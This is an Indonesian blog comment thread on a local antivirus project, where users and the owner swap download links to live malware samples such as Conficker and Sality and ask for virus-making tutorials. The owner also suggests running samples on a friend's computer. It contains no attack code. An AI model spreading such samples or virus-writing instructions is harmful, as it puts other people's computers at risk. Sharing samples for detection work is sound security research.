    wah ada antivirus lokal yang baru yah(baru tau saya ada morphost [>,<]) saya mau mencobanya dulu untuk virus win32/Virut.Z. Gara gara abis ngebaikin kompi temen saya, saya sempet liad ada game bagus, pas saya ambil ada virus nya ( sebelumnya saya gak pake antivirus… kompi saya ngeleg kalo make AV) makanya saya mao mencoba dulu nanti lah kapan kapan balik lagi kesini…..

  63. Felix said

    mas morp mao tanya virus yg paling kejam di atas apa namanya? trus yg bisa nyebar di jaringan ada nggak? thx

  64. Maxx said

    Mau bagi-bagi software nih,gratis….keknya sih bagus buat blokir situs porno
    Baru nemuin tadi, mohon ijin share,,dan jangan lupa buat dicoba..
    Versi Installer
    Portable version

  65. Fath said

    sample yg di download aman ga nih???

  66. Phic, kmaren aq dpet virus baru….
    PCM^V n SM^D^V blum bsa menangkapnya….
    Ni linknya…

    Virus Baru

  67. anda said

    ko’ morphos crash diwin 7, td aq scan banyak dapat malware n autoit.gmn please

  68. yudha said

    phic, sampel virus yg q kirim gak bisa dibuka ya pass nya? nih aq uda upload lagi. Viking

    http://www.sendspace.com/file/fmf43g

  69. Kevin... said

    internet password view itu utk apa?

  70. basava said

    http://eof-project.net/sources.html

    virus source codes

    maybe help u

  71. Morphic said

    ayo.
    share link virus disini…

    http://www.4shared.com/file/gm5Tdib8/_2__AcehkuA_by_Ranjau_Iblis.html
    http://www.4shared.com/file/9kUYBBWZ/_2__conficker_3feb2010.html
    http://www.4shared.com/file/ZgYe9PRA/_2__Momo_Geisha.html
    http://www.4shared.com/file/LH3whsIE/_2__SID-WormWin32Boohoo.html
    http://www.4shared.com/file/YDVSvDHq/_2__WormSymbOSComwara_by_Ranja.html
    http://www.4shared.com/file/TtuE42cR/2D2BBB.html
    http://www.4shared.com/file/Onoz5dS5/AcehkuA_by_Ranjau_Iblis.html
    http://www.4shared.com/file/KxllSEyM/AcehkuC_by_Ranjau_Iblis.html
    http://www.4shared.com/file/rBG4-2ZQ/AcehkuD_by_Ranjau_Iblis.html
    http://www.4shared.com/file/sx5kFwiJ/fannx_pass1234.html
    http://www.4shared.com/file/6ZaERWCg/MalwareIDB-1.html
    http://www.4shared.com/file/Oq67jyP9/Momo_Geisha.html
    http://www.4shared.com/file/gasaaRGR/umdmgr.html
    http://www.4shared.com/file/LRDxKbPu/update.html
    http://www.4shared.com/file/1pkBcvhm/VIRwmicvrts.html

  72. Kevin... said

    pgn dwl yg FakeAlert….
    Tapi kok gak ada ya>..???
    hmm…😦
    mana yg april 10?

  73. hexa cokrodiningrat said

    Siip jaya terus IT Indonesia..
    Upload terus virus terbaru nya ya… Saya minta bukan untuk mengembangkan virus, tapi membaca virus itu menyerang dari sisi mana… an mencoba tanpa anti virus untuk men solve masalah comp yang sudah terinsfeksi.. thanks ya..

  74. Ardy Prologic said

    Mas Morphic,, sample virus bulan Februari & selanjut nya kok gx ada…
    kalo’ bisa d posting juga biar bisa liat sejauh mana perkembangan virus di Indonesia…
    hehehe…:)

  75. Jerico said

    Mas minta source code yang bisa mengubah homepage web browser seperti mozilla,,opera,,dan yang lain nya…
    please lagi mau belajar nih…thanks….sukses selalu

  76. shendy said

    Wah semoga sukses dengan anti virusnya .. makasih aku dah donlod buat ngilangin virus hailua yang bercokol di Memmory Card hp saya.. ternyata bisa hilang dengan anti virus buatan anda ini. Tapi sayangnya tiba2 menghilang tanpa jejak… wah harus mengulang lagi.. coba dong segera diatasi masalah ini. Trims

  77. My World said

    salam kenal wat Mr.Morphic jga yg lainnya,,bhas virus molo,menarik juga nih,,x aja virusku bsa di apload ma temen2,,hehehe…

  78. nih aku said

    bang Morphic,, ane boleh minta sample virus gak,, kalo boleh minta link download nya, tapi virus nya dijadiin 1 folder,, kalo download 1 per 1 lama,, terimakasih sebelumnya….

  79. bang krut said

    Bro, Morphost dah bisa Unicode ,dan Hooking Belum

  80. Rahmat said

    Om Morphic mo nanya ku ada virus yg kedetect ma morphost expert bsanya cman kandangkan di folder lain tpi file virusnya kyk di copy paste ma morphost file aslinya g ilang maksudnya gmana y?

  81. baponk said

    MORPHOST bagus juga, yah kalo dibandingin sama SMADAV. morphost lebih maju.
    gw sih bermimpi bisa bikin antivirus bagus yang bisa membasmi virus lokal maupun luar.
    – bisa dijadiin firewall juga
    – berjalan di kernel mode,, supaya ngga bisa di kill atau di injeksi virus
    – ngga pake tehnik hash atau crc32, soalnya kalo ada virus variant baru cara itu udah ngga guna..

    untuk sekarang kompi gw, gw serahin sama MORPHOST
    thx ya

    • Shafry said

      Bang berita baru free domain .com\.org\.net gratis 100%
      klik di sini

      • Morphic said

        gk usah ikutan yg begituan shaf.
        itu pasti kalo dapat referal dapat domain gratis kan?

        aku dah pernah coba.
        teman-temanku udah ngeklik referalku tapi omong kosong.

    • Morphic said

      makasih banget.
      morphost sendiri udah gak pake teknik hash ato checksum lama lagi…
      sekarang morphostlab sudah mengembangkan satu checksum buatannya untuk mendeteksi virus.
      ditambah lagi pendeteksian dengan metode pemeriksaan rutin PE.

      thanks ya ponk.

  82. agus said

    aku ada virus reader_s tapi di mana upload nya nech

  83. cileupunk said

    Bro, punya sample virus DEADLOCK ga?

  84. cileupunk said

    Bro, punya virus DEADLOCK ga??

  85. Rully said

    kk katanya di bengkel bakal dicompil ulang kapan tuh kk aku tunggu yach…

  86. Aprijal said

    Tlg donk smua virusnya di kemasin lalu kirim donk sm q

  87. Rully said

    kk tolong dong semua virus yang ada di koleksi kk kemasin jadi 1 aq ribet kalo downoad satu-satu gitu.
    thanks buat kk sebelumnya yo….

  88. johan said

    bos, bisa kasi bocoran cara buat virus sederhana pa gak????

    • Morphic said

      untuk pelajaran kami bisa kasih…

      sebenarnya udah banyak dibahas di web lain…

      tapi lainkali kami akan post artikel cara buat virus sederhana…

  89. Kholis Virologist said

    virus lagi virus lagi
    huh g ada henti2nya
    yang penting ada morphost yang siap membantu semampunya

    eh boleh juga cms dari situs sebelah
    download di codenesia.4shared.com
    promosiiiii

  90. Underground's President said

    HELLP!!!!!!!!!!!

    Komputer gw kena tempat sampah (recycler) yang huruf “E”nya ada lambank pangkat(^)nya
    bisa diapus???

  91. yudha said

    @Safry:

    aku di bag. viruscaptor…. , klo virus analis, itu satryacode…

    fbx maksudnya facebook? , klo itu aku gak punya, ku punyanya Blog ajah… http://yudha-arch.blogspot.com main2 yah…

    oia, jangan lupa juga Rajin2 kirim Vrus ke http://Morphic.4shared , trus kmu bisa sekalian promosikan Blog mu…

  92. yudha said

    di Imel mu ada juga tuh… check..

  93. yudha said

    phic, nah kya gini jadi rapih… jadi enak nge-downloadnya… sip2.

    Phic, ada Sality varian lg tuh…. morphost blum detek..,

    he..he.. ciri khas sampel virus yg ku kirim selau ber-Awalan (y-)…

  94. as'ary said

    phic Software green regisrty kok dak ada???

    Bagi pang Tu Software…

    Thax

  95. Morphic said

    butuh sampel virus?
    silakan nikmati semua sampel virus yang ada disini…
    silakan download semua virusnya!!!

  96. yudha said

    he..he… klo dari dulu aku gabung di morphostlab, pasti bnyak sampel yg kukirim, coz yg namanya mahasiswa sering saling colok flash disk di komp…., dan pasti didlmnya ada virus nya… tp skarang jadwal kuliah ku sedikit..

  97. Bagas said

    Mas morphic, sy ad virus tu..
    Tp bwtn sndri gt..
    Namanya tornado
    Hehehe

    lihat di http://www.codenesia.com

  98. yudha said

    he..he.. virus2 kiriman q dimasukkan juga di download virus..

    virus serviks udah q upload blum ya?? mgkin penamaan nya beda…

  99. poet said

    Wah. . aku tau siapa yg bkin virus serviks itu.😀
    Hwekeke. . mlah dlu sering coment2an wktu friendsterku msh idup.😀

  100. mas, software Hack Facebook itu ternyata virus Malingsi.A/Serviks. jadi jangan dikategorikan sebagai software, tapi virus.😀

  101. Rh354 said

    yg ni yg udah di submit ke t4 lo

    http://www.4shared.com/file/125044426/753dc275/Rh354_sampel.html

  102. Rh354 said

    pic ni ada sample😀

    http://www.indowebster.com/Sample_Virus_untuk_NOD32.html

    update yg sampe 28 agustus lom detek😀

  103. yudha said

    phic, sudah nemu virus hubbun blom?

  104. Arham said

    Thx utk morphic krn udah nyediain pencarian file tercepat,
    itu berguna banget buat saya
    btw ada sampel virusta yg kencang efeknya karena saya mau coba di kompi saya
    bukan gila tapi cuman sekadar mau dipelajari sampe sedetil mungkin
    supaya hebat kayak morphic gitu

    Sinjai Utara, SulSEl

    • Morphic said

      mau di coba di kompi sendiri?
      pake kompi temen aja. lebih kurang resiko.

      sampel virus yang efeknya kencang ya? virus apa ya?

  105. haxeru said

    hei, itu “hack facebook” yang ada di software worm apa??

    itu worm ya?

    • Morphic said

      gak tahu worm apa…
      ntah siapa yang ngupload tuh.

      kemarin waktu mau download tuh software AV di warnetku langsung ngapus….
      jadi aku gak sempat tahu tuh virus apa.

      kalo ada info baru, kabari…

  106. yudha said

    PERHATIAN..!!

    Pengunjung MorphostLab jika mempunyai sampel virus,harap kirimkan ke http://morphic.4shared.com

    Morphostlab Team akan sangat berterima kasih…

  107. yudha said

    btw…. AV luar yg kw pakai apa sih phic? penasaran nehhh…🙂 barangkali aja sama, g sih pakai yg free ajah…

  108. ever said

    mas phic, punya sample virus Babon ga, & dimana sih t4 tuk dapetin sample2 virus lokal lainnya??

    ditunggu ya…

  109. dhikaz said

    Salam kenal para master…

    sbelumnya maaf nih aya msih awam soal ini,
    hmm, ada yg punya win32:trojan-gen gak, saya mo neliti ttg itu bwt tugas kuliah, n gimana sih cara bersihinnya secara manual???
    mohon bantuannya yaa….

    thanx a lot.

    • Morphic said

      itu unknowntrojan (menurut aku), biasanya AV luarnegeri kalo gak tahu nama suatu virus dengan jelas ngasih nama Trojan, NewMalware, ato yg lainnya…

      siapa yg dah pernah punya bisa share link downloadnya….

  110. elfazrie said

    Ijin download sample virusnya…
    oia butuh sample virus Kspoold sama cvlu nih…
    ada yang punya…???
    ditunggu…

  111. awank said

    bang phic, kok av-nya gak ada ya tombol clean atau disinfect. berarti ntar kalo dah kedetect ilang dong dengan file-filenya. apalagi file setup. kan sayang tuh.

    • Morphic said

      itu dah kuperkirakan dari dulu….
      paling-paling virus yang menginfeksi alman ama sality…

      lain dari itu cuma kspoold, pendekar blank yang nginfeksi word.
      untuk file word yang terinfeksi gampang diperbaiki…
      Begitu diklik tombol “delete” virusnya nanti otomatis clean…

      jadi intinya tombol “delete” di morphost ada 2 fungsinya:
      1. delete
      2. clean (untuk file tertentu). Morphost yang nentukan sendiri…

  112. Morphic said

    @VirSpector
    iya neh. udah lama tuh dibahas.

  113. VirSpector said

    Thx buat virus Confickernya. Tahu gk, klo pembuat virus Conficker itu sedang dicari oleh FBI atas suruhan Microsoft. Dan Microsoft memberi tahu ke-kita apabila kita menemukan penemunya, kita akan diberi uang sebesar US$250.000 (dua ratus lima puluh ribu dolar Amerika)

  114. Shafry said

    @R-1
    yu smuax virus ta????? please jawab yaaaaa

  115. Shafry said

    @R-1
    yu smuax virus ta?????

  116. sadri said

    sblmnya saya mengucapkan banyak terimakasih kepada bapak moderator, atas anti virusnya… tapi saya heran kenapa di komputer server saya antivirusnya ndak bisa di jalankan…
    setelah saya klik file instalasinya kok tidak ada proses sama sekali..

    kira-kira kenapa ya….?

    tanks..

  117. Yudha said

    phic, di kosan tmanku lg bnyak beredar virus kavos ,avast q men-detectnya win32.kavos.trj samplenya dah q kirim phic.. spertinya ini virus internet.

  118. Yudha said

    sama2 phic, smga morphost dapat detect ni virus…

  119. Morphic said

    @Yudha
    thnx conficker-nya. dah kucari-cari selama ini tapi gak dapat. thanks ya atas virusnya….

  120. Yudha said

    g udah coba kirim sample confickernya phic.. ditunggu updatetannya ya.. thxbro..

  121. Yudha said

    phic, iya nih skarang lg musim virus w32.conficker atau confi (kata “avast”) di warnet2dan dan menyebar lewat flash disk…

  122. R-1 said

    #Kamji
    #Morphic

    Bro, Utk teknik serangan virus conficker ada artikelnya di http://www.vaksin.com
    Semoga dapat menjadi bahan acuan utk membuat antinya.

  123. aloel said

    morphost is the best, I Like it, Thx’s Bro!!!!!!!!!!

  124. Morphic said

    #R-1
    thanks banget ya….

    #Kamji
    conficker aku baru dengar. itu virus baru ya. Mudah-mudahan Morphost bisa membasminya dengan heuristik-nya.

    morphost gak bisa memulihkan taskmanager and regedit kalo virusnya masih aktif

  125. Kamji said

    bang virus terbaru yang beredar adalah conficker… morphost bisa membasmi’y ga..?

    bang morphostkan bisa manggil regedit & taskmanager yang terinfeksi sality.. kira2 morphost bisa memulihkan regedit & taskmanager tanpa harus memanggil’y dari morphost..?

  126. R-1 said

    Bro, kabarnya butuh sampel virus?
    Ini gw share alamat utk unduh sampel:

    http://www.4shared.com/dir/9872678/38e89be1/sharing.html
    http://www.4shared.com/dir/6742542/b1e82789/viri4sharedcom.html

  127. Morphic said

    @Adnan
    Thanks ya adnan. kapan-kapan download lagi ya di blog-ku.

    @Titaner
    he he he. Yang jelas viva AV Local kan, bro?

  128. titaner said

    Mohon Izien Download Om…
    Lg Kesemsem Pengen Coba AV Lokal Semuanya…hehehe

    Rasanya Gmn gt klo dbandingkan dgn yg AV Impor. ^_^

  129. adnan said

    wah hebat km morphict av kamu hebat banget
    aku sering publikasikan tutor km ke skull aku loch sekalian pamerkan AV km yg hebat itu
    LOKASI:sinjai SUL SEL

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

 
%d blogger menyukai ini: